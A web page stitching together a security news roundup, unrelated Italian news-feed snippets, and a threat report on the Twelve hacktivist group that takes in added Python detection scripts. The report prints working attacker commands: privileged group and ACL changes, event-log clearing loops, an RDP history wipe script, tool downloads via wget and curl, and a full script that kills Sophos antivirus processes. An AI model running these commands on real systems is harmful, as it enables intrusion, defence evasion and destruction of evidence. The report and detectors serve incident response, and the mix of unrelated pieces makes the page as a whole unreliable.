A C2 system consists of an agent installed on compromised systems, usually aiming for stealth. These agents connect to a central server, sending information and then executing any instructions given. And finally there’s a client, which is often just a web interface or even a command line interface.
Now what sort of fun is possible in these C2 systems? Up first is Sliver, written in Go, with a retro command line interface. Sliver supports launching Metasploit on compromised hosts. Turns out, it accidentally supported running Metasploit modules against the server’s OS itself, leading to an easy remote shell from an authenticated controller account.
Havoc has a fancy user interface for the clients, and also a command injection flaw. A service name field gets used to generate a shell command, so you’re only a simple escape away from running commands. That’s not quite as useful as the API that failed open when a bad username/password was given. Oops.
Trains!
[Bertin Jose] has a bit of a side hobby, of scanning the Internet for interesting endpoints, with an emphasis on industrial control systems. In an automated scan, a CZAT7 device popped up — a traction power substation controller. This is a miniature power station that supplies power to electric railways. And this one was not only connected to the Internet, it exposed a web interface that probably wasn’t intended to be public. And it included coordinates. It’s delightful that we can point to a picture on Google Maps, to the little building in Poland where this controller lives.
[Bertin] has enough experience with control devices like these to know that 1111 is a common password. It’s wild that for these devices, both 1111 and 2222 worked for read/write access to the devices. This is where there was clearly a line, where fiddling around further inside these real devices would be ill-advised. What turned out to be more of a problem was finding the right people to disclose the device to. There was never a response, but the device seems to be finally off the Internet.
Raptor Train
We have news this week of a joint effort between Lumen Technologies and the US DoJ to take down the Raptor Train, a botnet that lives on a variety of routers, IoT devices, and cameras and NVRs. This botnet is interesting in that each device was only compromised for an average of 17 days at a time, with the infection only persisting until the next reboot.
What’s always fun about watching malware activity like this is to line up activity with timezones around the world. This one roughly corresponds to a 10:00 AM to 7:00 PM working day in China Standard Time, which checks out with the likely attribution to the Chinese group, Flax Typhoon. The count of total devices was somewhere around 260,000, with exploitation due to a combination of 0-day and n-day vulnerabilities. Turns out maybe it’s not a great idea to put those cameras on the Internet.
Discord and DAVE
Discord has rolled out DAVE, Discord Audio and Video end-to-end Encryption. This new solution will provide encryption for voice and video for DMs, Group DMs, and other live calls on Discord. The solution is Open Source, and was designed in collaboration with trailofbits.
Lots of established cryptography was used, and at a brief look the scheme seems to check out. Notably missing is any mention of quantum-resistant cryptography. That’s not entirely unexpected, as we’re still several years away from practical quantum computers, and the cryptography schemes designed to resist attacks by quantum computers are still quite new and immature.
The Other Side of the Coin
In an interesting counterpoint to Discord’s new scheme, Interpol has taken down Ghost, an end-to-end-encrypted communications platform widely used for organized crime. It seems that Ghost was designed and marketed specifically for criminal use, but one has to ask whether Discord will also face repercussions for the move to strong encryption.
Bits and Bytes
The folks at Cyber Security Associates have the scoop on doing a Patch Diff on a vulnerability fixed in a recent Windows Patch Tuesday. The short explanation is that incoming calls to the driver weren’t checked for whether they originated in the kernel or in userspace.
And finally, there’s a real mystery on the Internet. GreyNoise describes Noise Storms of spoofed packets flooding the Internet. These seem to be malicious, coming in waves since January 2020. The inclusion of the string LOVE in recent packets suggests the name LOVE Storm. GreyNoise has made packet captures available, if any of our readers feel like joining in on the sleuthing to figure out what these packets are up to.
Healthcare and the cyber emergency. Frattasi (ACN): "AI to help defend the sector from attacks"
@Informatica (Italy e non Italy 😁)
The awareness campaign for healthcare facilities on cybersecurity starts in Lazio, through specific operational guidelines for the healthcare sector drawn up by the Agenzia per la Cybersicurezza Nazionale. The project
Ukrainian lessons for the Pentagon. Here is the new drone unit
@Notizie dall'Italia e dal mondo
In the forests of Louisiana, the US Army is testing the effectiveness of a new type of unit set up on the basis of lessons learned from the conflict in Ukraine. As part of the wargame organized last August by the US Army's Joint Readiness Training Center, the new platoon of
«Draghi looks to the past. Financing companies does not change development»
@Notizie dall'Italia e dal mondo
The new article by @valori@poliversity.it
Interview with economist Mario Pianta on the many shadows of the European plan presented by Mario Draghi
The article «Draghi looks to the past. Financing companies does not change development» originally appeared on Valori.
The pregnancy mystery and that violent quarrel: what emerges from the Sangiuliano-Boccia chats
@Politica interna, europea e internazionale
Violent quarrels, threats, an alleged pregnancy and confidentiality agreements never signed. A relationship that was stormy to say the least, between former Culture Minister Gennaro Sangiuliano and entrepreneur Maria Rosaria Boccia, at least according to what is reported in the complaint
Healthcare: ACN presents the threat report. Director General Frattasi: "AI to help defend the sector from attacks"
@Informatica (Italy e non Italy 😁)
The awareness campaign for healthcare facilities on cybersecurity starts in Lazio, through specific operational guidelines for the healthcare sector drawn up by the Agenzia per
-=TWELVE=- is back
In the spring of 2024, posts with real people’s personal data began appearing on the -=TWELVE=- Telegram channel. Soon it was blocked for falling foul of the Telegram terms of service. The group stayed off the radar for several months, but as we investigated a late June 2024 attack, we found that it employed techniques identical to those of Twelve and relied on C2 servers linked to the threat actor. We are therefore confident that the group is still active and will probably soon resurface. This article uses the Unified Kill Chain methodology to analyze the attackers’ actions.
About Twelve
The group was formed in April 2023 in the context of the Russian-Ukrainian conflict and has attacked Russian government organizations ever since.
The threat actor specializes in encrypting and then deleting victims’ data, which seriously complicates efforts to recover the IT environment. This suggests that their main goal is inflicting as much damage as possible. When attacking, the group aims to reach critical infrastructure, but they do not always succeed. In addition, Twelve exfiltrates sensitive information from its victims’ systems and posts it on its Telegram channel.
Interestingly, Twelve shares infrastructure, utilities and techniques (TTPs) with the DARKSTAR ransomware group, formerly known as Shadow or COMET, which suggests that the two belong to the same syndicate or activity cluster. At the same time, whereas Twelve’s actions are clearly hacktivist in nature, DARKSTAR sticks to the classic double extortion pattern. This variation of objectives within the syndicate underscores the complexity and diversity of modern cyberthreats.
Unified Kill Chain: In
The In stage in terms of the Unified Kill Chain refers to the initial phases of a cyberattack aimed at gaining access to the target organization’s LAN. These phases include a range of tactical actions: from external reconnaissance to assuming control of the systems inside the protected network.
Reconnaissance
While we do not know the exact reconnaissance techniques the threat actor uses, we suspect that they scan IP address ranges across Russia based on geotags and try to identify VPN servers and applications accessible from the internet that could be used as entry points into a target organization’s or a contractor’s infrastructure.
Resource Development
As we analyzed the cyberattacks, we found that the threat actor relied exclusively on well-known and freely available tools. The tools frequently used by the group include Cobalt Strike, mimikatz, chisel, BloodHound, PowerView, adPEAS, CrackMapExec, Advanced IP Scanner and PsExec.
Initial Access and Delivery
In most of the attacks we are aware of, the adversary gained initial access to victims’ infrastructure through valid local or domain accounts, VPN or SSH certificates. After gaining access to the victim’s infrastructure, the attackers used the Remote Desktop Protocol (RDP) to move laterally.
In most cases, the attackers penetrated the target infrastructure via one of the victim’s contractors. To do this, they gained access to the contractor’s infrastructure and then used its certificate to connect to its customer’s VPN. Having obtained access to that, the adversary can connect to the customer’s systems via the Remote Desktop Protocol (RDP) and then penetrate the customer’s infrastructure.
Exploitation
Web shells
As we analyzed the web servers compromised by the attackers, we discovered a large number of web shells. The paths where these were found looked as follows.
/home/bitrix/ext_www/[REDACTED]/assets/images/
/home/bitrix/ext_www/[REDACTED]/bitrix/templates/.default/ajax/images/
/home/bitrix/ext_www/[REDACTED]/bitrix/admin/
All the web shells were written in PHP and bore random names:
F6d098f417.php, 3425b29f4e.php, ecb2979be7.php, 04116e895b.php, 7784ba76e2.php,
a4daa72a70.php, 5146d22914.php, 001d7a.php, 8759c7.php, 48a08b.php, 6f99ac.php,
82f5f4.php, 0dd37d.php, 6bceb2.php, d0af43.php
They could serve various purposes: some executed arbitrary commands, others moved files, and still others created and sent email. Below are two examples of single-line web shells for moving files.
Examples of web shells for moving files
It is worth noting that most of the web shells used by the threat actor are publicly available tools. Here are two examples:
- https://github[.]com/stefanpejcic/wordpress-malware;
- https://github[.]com/tennc/webshell/blob/master/php/wso/wso2.php.
We use the example of a remailer (script for sending email) to examine how the web shells function.
Example of a remailer script used by the threat actor
The attackers used this PHP script to send email messages. It starts by checking for requisite data, such as the recipient’s address, subject and message body inside a POST request. If any of the key data is missing, the script reports an error and quits. After successfully checking and preparing email components, it uses the PHP mail() function to send the email.
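The web shells above share three traits a defender can hunt for without signatures: a randomly generated hexadecimal filename, placement in a directory that should hold no PHP at all (such as assets/images/), and request input flowing straight into a sensitive function (mail(), rename(), system() and the like). The following Python hunter, an added example that is not part of the Kaspersky article, scores each .php file on those traits over a constructed Bitrix-like tree; a single trait alone is not enough to flag a file, so the legitimate site mailer in the sample passes.

```python
import os
import re
import tempfile

RANDOM_NAME = re.compile(r"^[0-9a-f]{6,32}\.php$", re.IGNORECASE)   # 001d7a.php, F6d098f417.php, ...
NON_CODE_DIRS = {"images", "img", "image", "upload", "uploads", "cache", "tmp"}
USER_INPUT = re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\b")
SENSITIVE_CALL = re.compile(
    r"\b(mail|rename|copy|move_uploaded_file|system|exec|shell_exec|passthru|eval|assert)\s*\("
)


def file_reasons(rel_path, content):
    """Return the list of suspicious traits found for one PHP file (path relative to the web root)."""
    parts = set(os.path.normpath(rel_path).split(os.sep))
    reasons = []
    if RANDOM_NAME.match(os.path.basename(rel_path)):
        reasons.append("random hex filename")
    if parts & NON_CODE_DIRS:
        reasons.append("php file in a static-content directory")
    if USER_INPUT.search(content) and SENSITIVE_CALL.search(content):
        reasons.append("request input flows into a sensitive call")
    return reasons


def hunt(root, min_reasons=2):
    """Walk a web root and report PHP files showing at least `min_reasons` traits."""
    findings = {}
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if not fn.lower().endswith(".php"):
                continue
            full = os.path.join(dirpath, fn)
            with open(full, encoding="utf-8", errors="replace") as fh:
                content = fh.read()
            rel = os.path.relpath(full, root)
            reasons = file_reasons(rel, content)
            if len(reasons) >= min_reasons:
                findings[rel.replace(os.sep, "/")] = reasons
    return findings


# Constructed sample tree. The two "shells" contain marker tokens only and are not working scripts.
SAMPLE_TREE = {
    "assets/images/F6d098f417.php": "<?php /* constructed marker-only sample */ $_POST['a']; mail(); rename(); ?>",
    "bitrix/admin/001d7a.php": "<?php /* constructed marker-only sample */ $_REQUEST['c']; system(); ?>",
    "bitrix/admin/index.php": "<?php require_once 'header.php'; echo 'admin'; ?>",
    "local/php_interface/mailer.php": "<?php mail(SITE_ADMIN, 'Feedback', $_POST['msg']); ?>",
    "assets/images/logo.png": "not php",
}


def build_sample_tree():
    root = tempfile.mkdtemp(prefix="webshell_hunt_")
    for rel, content in SAMPLE_TREE.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def hunt_sample():
    return hunt(build_sample_tree())


if __name__ == "__main__":
    for path, reasons in hunt_sample().items():
        print(path, "->", "; ".join(reasons))
```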
FaceFish backdoor
An incident we investigated involved the FaceFish backdoor, loaded with the help of a web shell installed on a VMware vCenter server by exploiting the CVE-2021-21972 and CVE-2021-22005 vulnerabilities in the vSphere virtualization platform. The former vulnerability can be found in the platform’s client and allows remote code execution, while the latter is an arbitrary file upload vulnerability in the server.
Like most of the web shells used by the group, this one is publicly available.
https://github[.]com/NS-Sp4ce/CVE-2021-21972/tree/main/payload/Linux
It was located at the following path in the infected system:
/usr/lib/vmware-vsphere-ui/server/static/resources/libs/shell.jsp
Once started, FaceFish saves a libs.so shared library in the system, injects it into the sshd process with the ld.so.preload method and restarts the SSH service.
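The ld.so.preload trick leaves two artifacts that can be cross-checked: the entry in /etc/ld.so.preload itself and the foreign library mapped into the running sshd. The following Python check, an added example that is not part of the Kaspersky article, parses both a preload file and a /proc/<pid>/maps listing and reports preload entries, preloaded libraries actually mapped into the process, and mappings outside the distribution's library directories; the library path /usr/local/lib/libs.so in the sample is constructed, as the article does not give the path FaceFish uses.

```python
import re
from pathlib import PurePosixPath

# Where a stock distribution keeps its shared libraries; the trailing slash avoids matching "/libfoo".
TRUSTED_LIB_PREFIXES = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/", "/usr/libexec/")

# One mapping per line: start-end perms offset dev inode [path]; only file-backed lines carry a path.
MAPS_RE = re.compile(r"^[0-9a-f]+-[0-9a-f]+\s+\S+\s+\S+\s+\S+\s+\d+\s+(?P<path>/\S+)$")


def parse_preload(text):
    """Library paths listed in /etc/ld.so.preload: one per line, '#' starts a comment."""
    libs = []
    for line in text.splitlines():
        entry = line.split("#", 1)[0].strip()
        if entry:
            libs.append(entry)
    return libs


def mapped_libraries(maps_text):
    """Distinct shared objects mapped by a process, read from its /proc/<pid>/maps."""
    libs = set()
    for line in maps_text.splitlines():
        m = MAPS_RE.match(line.strip())
        if m and ".so" in PurePosixPath(m["path"]).name:
            libs.add(m["path"])
    return libs


def check(preload_text, maps_text):
    """Cross-check ld.so.preload against what the process actually has mapped."""
    preloaded = parse_preload(preload_text)
    mapped = mapped_libraries(maps_text)
    return {
        # Any entry at all deserves review: most systems have no ld.so.preload.
        "preload_entries": preloaded,
        "preloaded_and_mapped": [lib for lib in preloaded if lib in mapped],
        "untrusted_mappings": sorted(lib for lib in mapped if not lib.startswith(TRUSTED_LIB_PREFIXES)),
    }


def check_live(pid):
    """Run the same check on a live host, e.g. check_live(pid_of_sshd); needs read access to /proc."""
    try:
        with open("/etc/ld.so.preload", encoding="utf-8") as fh:
            preload_text = fh.read()
    except FileNotFoundError:
        preload_text = ""
    with open(f"/proc/{pid}/maps", encoding="utf-8") as fh:
        return check(preload_text, fh.read())


# Constructed sample: a preload entry pointing at a library that sshd has indeed mapped.
SAMPLE_PRELOAD = "/usr/local/lib/libs.so\n"
SAMPLE_MAPS = """\
5570a1200000-5570a12f0000 r-xp 00000000 fd:01 262144 /usr/sbin/sshd
7f3a2c000000-7f3a2c1c0000 r-xp 00000000 fd:01 131073 /lib/x86_64-linux-gnu/libc.so.6
7f3a2c400000-7f3a2c410000 r-xp 00000000 fd:01 917512 /usr/local/lib/libs.so
7f3a2c600000-7f3a2c621000 rw-p 00000000 00:00 0      [heap]
"""


def check_sample():
    return check(SAMPLE_PRELOAD, SAMPLE_MAPS)


if __name__ == "__main__":
    for key, value in check_sample().items():
        print(f"{key}: {value}")
```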
Persistence
To gain a foothold in the domain infrastructure, the adversary used PowerShell to add domain users and groups, and to modify ACLs (Access Control Lists) for Active Directory objects. Below is a list of the PowerShell commands they ran.
Add-DomainGroupMember -Identity [REDACTED] -Members 'EXCHANGE WINDOWS PERMISSIONS'
Add-DomainGroupMember -Identity [REDACTED] -Members 'Organization Management'
Add-DomainGroupMember -Identity [REDACTED] -Members "EXCHANGE WINDOWS PERMISSIONS"
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "users" -PrincipalIdentity "engineers"
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "dc1" -PrincipalIdentity "users"
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "dc1" -PrincipalIdentity "userasdasdasds"
Set-DomainObject -Credential $Cred -Identity [REDACTED]-SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
The attackers also added domain accounts and user groups with the net.exe system utility.
net user [REDACTED] engineers /domain /add
net group [REDACTED] engineers /domain /add
net group engineers [REDACTED] /domain /add
net group engineers 'EXCHANGE WINDOWS PERMISSIONS' /add /domain
net group 'engineers' 'EXCHANGE WINDOWS PERMISSIONS' /add /domain
net group engineers /domain
net group users /domain
net group "Domain Administrators" [REDACTED] /add /domain
Furthermore, they tried distributing and running malware through the task scheduler and modified group policies to save malicious tasks for the entire domain.
Defense Evasion
To avoid detection, the attackers disguised their malware and tasks under the names of existing products or services.
C:\Windows\System32\Tasks\run
C:\Windows\System32\Tasks\Update Microsoft
C:\Windows\System32\Tasks\Yandex
C:\Windows\System32\Tasks\YandexUpdate
C:\Windows\SYSVOL_DFSR\domain\scripts\intel.exe
They also used a range of techniques to hide the traces of their activity. In particular, they cleared event logs with the wevtutil.exe system utility in various command shell variants.
powershell -command wevtutil el | Foreach-Object {Write-Host Clearing $_; wevtutil cl $_}
C:\Windows\system32\cmd.EXE" /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1
In addition, the attackers used a script that cleared the RDP connection history to remove the traces of their RDP usage, recent documents and list of executed files.
@echo off
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
attrib -s -h %userprofile%\documents\Default.rdp
del %userprofile%\documents\Default.rdp
del /f /s /q /a %AppData%\Microsoft\Windows\Recent\AutomaticDestinations
reg delete "HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/RunMRU" /va /f
Command and Control
In one of the group’s attacks, we discovered traces of the Cobalt Strike framework, which the attackers used to contact their C2 and distribute malicious payloads. We found the tool at the following path:
\users\{username}\pictures\photos_delo\loop.exe
The adversary also used the curl and wget system utilities to deliver various tools to compromised hosts.
wget https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
curl https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
Unified Kill Chain: Through
The Through stage in terms of the Unified Cyber Kill Chain refers to adversary actions within a previously compromised target network aimed at gaining access to further systems and data that the attacker needs to achieve their goals. This stage involves a series of steps designed to propagate across the network and access critical assets.
Pivoting
The adversary used ngrok to tunnel traffic. They installed that utility immediately after connecting to the system, and set port 3389 (standard RDP port) in the configuration file. After that, all illegitimate connections to the system via RDP were made through ngrok. The attackers attached the utility to a service named “svchost” with the following command:
C:\ProgramData\svchost\svchost.exe service run --config C:\ProgramData\svchost\svchost.yml
C:\ProgramData\svchost\ was a directory created by the attackers. The svchost.exe file is ngrok itself, while svchost.yml serves as its configuration file. In addition to the port number, it contains an authorization token, which looks as follows: 2YXVHSiK9hhc4aKCbH4i6BLh21J_6zwxt**********. Tokens differ between samples.
The ::::%16777216 value in the Source Network Address field of the RDP event log indicates that the attackers initiated their connections via ngrok.
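The Persistence, Defense Evasion and Pivoting activity described above (membership changes to privileged groups, log clearing and RDP history wiping, an ngrok binary named svchost.exe outside System32, and RDP sessions arriving from ::::%16777216) all surface in Windows event logs. The following Python rules, an added example that is not part of the Kaspersky article, run over constructed event records; Security-log field names (SubjectUserName, MemberName, TargetUserName, NewProcessName, CommandLine) are the real ones, while representing the RDP session events with the display name SourceNetworkAddress and event IDs 21/25 is an assumption of this example.

```python
import re

# Groups whose membership the article shows the attackers modifying (compared case-insensitively).
SENSITIVE_GROUPS = {
    "domain admins", "domain administrators", "enterprise admins",
    "exchange windows permissions", "organization management",
}
GROUP_ADD_EVENTS = {4728, 4732, 4756}   # member added to a security-enabled global/local/universal group
LOG_CLEARED_EVENTS = {1102, 104}        # Security log cleared / another log cleared
RDP_SESSION_EVENTS = {21, 25}           # assumed: TerminalServices-LocalSessionManager logon / reconnect
TUNNELLED_RDP_SOURCE = "::::%16777216"  # source address the article ties to ngrok-forwarded RDP
LEGIT_SVCHOST_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
WEVTUTIL_CLEAR = re.compile(r"wevtutil(?:\.exe)?\s+(?:cl|clear-log)\b", re.IGNORECASE)
RDP_HISTORY_WIPE = re.compile(r"reg(?:\.exe)?\s+delete\s+.*terminal server client", re.IGNORECASE)


def detect(events):
    """Run the rules over event records and return (rule, detail) pairs in event order.

    Each record is a dict with EventID, Channel and a Data dict of the event's named fields.
    """
    findings = []
    for ev in events:
        eid, d = ev.get("EventID"), ev.get("Data", {})
        if eid in GROUP_ADD_EVENTS and d.get("TargetUserName", "").lower() in SENSITIVE_GROUPS:
            findings.append(("sensitive group membership change",
                             f'{d.get("MemberName")} added to {d["TargetUserName"]} by {d.get("SubjectUserName")}'))
        elif eid in LOG_CLEARED_EVENTS:
            findings.append(("event log cleared", f'{ev.get("Channel")} cleared by {d.get("SubjectUserName")}'))
        elif eid == 4688:  # process creation: inspect the command line and the image path
            cmd, image = d.get("CommandLine", ""), d.get("NewProcessName", "")
            if WEVTUTIL_CLEAR.search(cmd):
                findings.append(("log clearing command", cmd))
            if RDP_HISTORY_WIPE.search(cmd):
                findings.append(("RDP history wipe", cmd))
            if image.lower().endswith("\\svchost.exe") and not image.lower().startswith(LEGIT_SVCHOST_DIRS):
                findings.append(("svchost.exe outside System32", image))
        elif eid in RDP_SESSION_EVENTS and d.get("SourceNetworkAddress") == TUNNELLED_RDP_SOURCE:
            findings.append(("RDP session via local tunnel (ngrok pattern)",
                             f'{d.get("User")} session {d.get("SessionID")}'))
    return findings


# Constructed sample events; account names, DNs and session numbers are invented.
SAMPLE_EVENTS = [
    {"EventID": 4728, "Channel": "Security", "Data": {
        "SubjectUserName": "svc_backup", "MemberName": "CN=engineers,OU=Groups,DC=corp,DC=example",
        "TargetUserName": "EXCHANGE WINDOWS PERMISSIONS"}},
    {"EventID": 4728, "Channel": "Security", "Data": {
        "SubjectUserName": "hr_admin", "MemberName": "CN=jdoe,OU=Users,DC=corp,DC=example",
        "TargetUserName": "HR Staff"}},
    {"EventID": 4688, "Channel": "Security", "Data": {
        "NewProcessName": "C:\\Windows\\System32\\wevtutil.exe", "CommandLine": "wevtutil.exe cl Security"}},
    {"EventID": 4688, "Channel": "Security", "Data": {
        "NewProcessName": "C:\\Windows\\System32\\reg.exe",
        "CommandLine": 'reg delete "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers" /f'}},
    {"EventID": 4688, "Channel": "Security", "Data": {
        "NewProcessName": "C:\\ProgramData\\svchost\\svchost.exe",
        "CommandLine": "C:\\ProgramData\\svchost\\svchost.exe service run --config C:\\ProgramData\\svchost\\svchost.yml"}},
    {"EventID": 4688, "Channel": "Security", "Data": {
        "NewProcessName": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "C:\\Windows\\System32\\svchost.exe -k netsvcs"}},
    {"EventID": 1102, "Channel": "Security", "Data": {"SubjectUserName": "svc_backup"}},
    {"EventID": 21, "Channel": "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational", "Data": {
        "User": "CORP\\svc_backup", "SessionID": 3, "SourceNetworkAddress": "::::%16777216"}},
    {"EventID": 21, "Channel": "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational", "Data": {
        "User": "CORP\\alice", "SessionID": 2, "SourceNetworkAddress": "10.0.5.14"}},
]


def detect_sample():
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for rule, detail in detect_sample():
        print(f"[{rule}] {detail}")
```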
Discovery
The adversary used Advanced IP Scanner, BloodHound and adPEAS to reconnoiter the LAN and domain infrastructure, and to investigate the relationships between domains. Advanced IP Scanner can quickly identify all devices on a given network. BloodHound is used to analyze and visualize users and systems the domain trusts, and to identify paths of least resistance for privilege escalation. adPEAS is used to attack Active Directory, detect configuration flaws and identify ways to escalate domain privileges. Combined, these tools allow attackers to effectively probe and exploit victims’ LANs.
In addition, the group used PowerView module cmdlets to discover domain user accounts.
Get-DomainObject users
Get-ADUsers users
Get-ADUser users
Get-ADUser -Filter * -SearchBase "[REDACTED OU]"
Get-ADUser -Filter * -SearchBase "[REDACTED OU]" | findstr Name
The group used PowerShell to obtain domain group data.
Get-ADGroup
Get-ADGroup "EXCHANGE WINDOWS PERMISSIONS"
Get-ADGroupMember "EXCHANGE WINDOWS PERMISSIONS"
Get-ADGroupMember "engineers"
Get-DomainGroupMember engineers
Get-DomainGroupMember skzi
Privilege Escalation
To escalate privileges, the adversary primarily used the legitimate credentials of users with administrative access privileges.
In addition, they used the PowerView module to modify the attributes of new accounts they set up to achieve their goals:
Add-DomainObjectAcl -Rights 'All'
The -Rights 'All' parameter grants the account full access to the specified object. This may include permission to read, write, create, delete and perform various operations on the object.
Example of permissions granted with PowerView to an account of interest to the attackers
Execution
Scripts and commands
The adversary used system interpreters and publicly available tools, as well as self-written .bat and PowerShell scripts, to perform various actions in the system.
Below are some examples of attack scripts we discovered:
gpo.ps1
Sophos_kill_local.ps1
Logon.bat
CleanRDPHistory.bat
c:\intel\GPO.bat
\\netlogon\logon.bat
c:\intel\test.ps1
\\netlogon\u.bat
\SYSVOL\domain\scripts\outlookconf2003.ps1
The commands recorded in the PowerShell log show that the attackers ran interactive PowerShell sessions on the hosts they compromised; the sequence also gives an idea of the operator's level of competence.
Below is the list of commands the attackers ran while trying to import the PowerView module, with the typos and the execution-policy change that preceded the successful import:
impot .\PowerView.ps1
import .\PowerView.ps1
Import-Module .\PowerView.ps1
cd C:\Users\Public\Documents
Import-Module .\PowerView.ps1
Set-ExecutionPolicy bypass
Import-Module .\PowerView.ps1
Sophos_kill_local.ps1
The script we detected attempts to terminate every Sophos process on the computer and writes the outcome both to a local log file and to a log file on the NETLOGON share, which let the operator check from the domain controller which hosts had been disarmed.
$LogTime = Get-Date -Format "MM-dd-yyyy_hh-mm-ss"
$path = "C:\Program Files (x86)\Sophos\Logs\"
$pcname = $env:computername
$Processes = Get-WmiObject -Class Win32_Process -ComputerName $env:computername -Filter "ExecutablePath LIKE '%Sophos%'"
foreach ($process in $processes) {
$ProcessName = $process.name
$returnval = $process.terminate()
$processid = $process.handle
if($returnval.returnvalue -eq 0) {
$LogFile1 = 'C:\Program Files (x86)\Sophos\Logs\'+$LogTime+"_Success-Terminated"+".txt"
$LogFile11 = '\\[redacted]\NETLOGON\Sophos\Logs\'+$pcname+"_"+$LogTime+"_Success-Terminated"+".txt"
"The process $ProcessName ($processid) has been terminated successfully." | Out-File $LogFile1 -Append -Force
"The process $ProcessName ($processid) has been terminated successfully." | Out-File $LogFile11 -Append -Force
} else {
$LogFile2 = 'C:\Program Files (x86)\Sophos\Logs\'+$LogTime+"_Sophos Not-Terminated"+".txt"
$LogFile22 = '\\[redacted]\NETLOGON\Sophos\Logs\'+$pcname+"_"+$LogTime+"_Sophos Not-Terminated"+".txt"
"The process $ProcessName ($processid) has not been terminated." | Out-File $LogFile2 -Append -Force
"The process $ProcessName ($processid) has not been terminated." | Out-File $LogFile22 -Append -Force
}
}
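Because the script logs its results under NETLOGON\Sophos\Logs with the host name and a timestamp in the file name, the attackers' own log files are a useful scoping source during incident response. The triage script below is an added example written for this report, not part of the attackers' tooling or the original page: it parses files in the format the script produces (<host>_<MM-dd-yyyy_hh-mm-ss>_Success-Terminated.txt and <host>_<timestamp>_Sophos Not-Terminated.txt, one line per process) and reports which hosts lost endpoint protection and which processes survived. The file names, host names and process names in SAMPLE_FILES are constructed.

```python
"""Triage the log files written by the Sophos_kill_local.ps1 script.

Added example for this report; not code from the page or the attackers.
SAMPLE_FILES is constructed to match the script's output format.
"""
import re
from datetime import datetime
from pathlib import Path

FILENAME_RE = re.compile(
    r"^(?P<host>.+?)_(?P<ts>\d{2}-\d{2}-\d{4}_\d{2}-\d{2}-\d{2})_"
    r"(?P<outcome>Success-Terminated|Sophos Not-Terminated)\.txt$"
)
LINE_RE = re.compile(
    r"^The process (?P<name>\S+) \((?P<pid>\d+)\) has "
    r"(?P<result>been terminated successfully|not been terminated)\.$"
)


def parse_timestamp(ts):
    # The script uses .NET "hh", a 12-hour clock with no AM/PM marker, so the
    # hour is ambiguous; %I parses it as written.
    return datetime.strptime(ts, "%m-%d-%Y_%I-%M-%S")


def triage(files):
    """files: iterable of (filename, content) pairs.
    Returns {host: {"first_seen": datetime, "terminated": [(name, pid)],
                    "survived": [(name, pid)]}}."""
    hosts = {}
    for filename, content in files:
        m = FILENAME_RE.match(filename)
        if not m:
            continue  # not one of the script's log files
        entry = hosts.setdefault(m["host"], {"first_seen": None, "terminated": [], "survived": []})
        ts = parse_timestamp(m["ts"])
        if entry["first_seen"] is None or ts < entry["first_seen"]:
            entry["first_seen"] = ts
        for line in content.splitlines():
            lm = LINE_RE.match(line.strip())
            if not lm:
                continue
            bucket = "terminated" if lm["result"].startswith("been") else "survived"
            entry[bucket].append((lm["name"], int(lm["pid"])))
    return hosts


def hosts_without_protection(hosts):
    """Hosts on which at least one Sophos process was killed."""
    return sorted(h for h, e in hosts.items() if e["terminated"])


def load_share(log_dir):
    """Read every *.txt in a copy of the NETLOGON\\Sophos\\Logs directory."""
    return [(p.name, p.read_text(errors="replace")) for p in Path(log_dir).glob("*.txt")]


# Constructed sample files (host and process names are illustrative).
SAMPLE_FILES = [
    ("WS-ACC-07_09-18-2024_02-41-13_Success-Terminated.txt",
     "The process SophosFS.exe (1324) has been terminated successfully.\n"
     "The process SSPService.exe (1408) has been terminated successfully.\n"),
    ("WS-ACC-07_09-18-2024_02-41-13_Sophos Not-Terminated.txt",
     "The process SophosHealth.exe (1532) has not been terminated.\n"),
    ("FILESRV01_09-18-2024_02-40-58_Sophos Not-Terminated.txt",
     "The process SophosFS.exe (2016) has not been terminated.\n"),
    ("notes.txt", "unrelated file\n"),
]

if __name__ == "__main__":
    result = triage(SAMPLE_FILES)
    for host in hosts_without_protection(result):
        e = result[host]
        print(f"{host}: protection killed at {e['first_seen']}, {len(e['survived'])} process(es) survived")
```

Run it against load_share(r"\\<dc>\NETLOGON\Sophos\Logs") or a forensic copy of that directory. Hosts listed only under "Not-Terminated" (FILESRV01 in the sample) still had tamper protection working, which is worth recording separately because those are the hosts where the EDR may have captured what came next.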
Using the Task Scheduler
To perform the final destructive actions, i.e. launching the ransomware and the wipers, the adversary used scheduled tasks deployed through modified group policies. This let them execute the payloads on every machine in the domain at the same time. The command lines below were recovered from the Task Scheduler cache in the registry (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks).
Task name | Command line | Description |
Dead1 | reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9042DCD8-***}:Actions","cmd.exe /c c:\programdata\twelve.exe -pass *** | Runs the ransomware via the CLI, passing a password as an argument |
Dead2 | reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AB35C377-***}:Actions","cmd.exe /c \\[DOMAIN]\netlogon\wiper.exe" | Launches the wiper via the CLI from the netlogon network share |
